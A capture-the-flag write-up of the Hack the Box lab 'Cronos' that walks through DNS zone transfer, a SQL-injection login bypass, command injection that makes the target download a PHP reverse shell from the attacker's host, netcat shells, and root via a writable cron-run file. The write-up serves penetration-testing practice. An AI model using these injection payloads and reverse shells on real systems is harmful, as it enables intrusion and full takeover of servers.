Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. Cronos is retried vulnerable lab presented by Hack the Box.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Let’s begin with nmap port enumeration.
$ nmap -T4 -A -sV 10.10.10.13 Starting Nmap 7.50 ( https://nmap.org ) at 2018-11-27 14:50 IST Nmap scan report for 10.10.10.13 Host is up (0.21s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (EdDSA) 53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds
It has DNS server
Add cronos.htb on /etc/hosts
Dig
root@kali:/htb/cronos# dig axfr @10.10.10.13 cronos.htb ; <<>> DiG 9.11.5-1-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 33 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Tue Nov 27 14:41:37 EST 2018 ;; XFR size: 7 records (messages 1, bytes 203)
Visit http://admin.cronos.htb.
There’s a SQLi in the username field. Enter admin’– – in username field. (or enter ‘ or 1=1# in username field.)
The input field in welcome.php is vulnerable to command injection.
Create php-reverse-shell payload and upload it to the server.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
root@kali:/htb/cronos# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.13 - - [27/Nov/2018 12:57:29] "GET /r2.txt HTTP/1.1" 200 -
In the input field of welcome.php enter : 8.8.8.8; pwd 8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/ 8.8.8.8; cp r2.txt puckie.php
In the input field of welcome.php enter : 8.8.8.8; pwd 8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/ 8.8.8.8; cp r2.txt puckie.php
We need to upload txt because we cannot upload php. Hence first upload txt and then rename to .php
Now start 1st netcat listener and get the shell. by browsing to http://admin.cronos.htb/puckie.php
root@kali:~/Desktop# nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 45074
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:15:46 up 1 day, 16:28, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@cronos:/$
check /etc/crontab $ cat crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
The last scheduled activity executes a process called artisan locate in /var/www/laravel
When we check the file’s permissions:
100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan
So we can replace this file with our payload.
Create a new payload and upload it here.
Rename it to artisan
Make it executable by chmod +x artisan
Put this 2nd netcat listener to background and listen for the new connection
root@kali:~/Desktop# nc -lvp 1234 listening on [any] 1234 ... connect to [10.10.14.19] from cronos.htb [10.10.10.13] 37984 Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 21:52:01 up 1 day, 17:04, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off #
Wait for 1 minute as the executes every one minute
You’ll get root access
Author: Jacco Straathof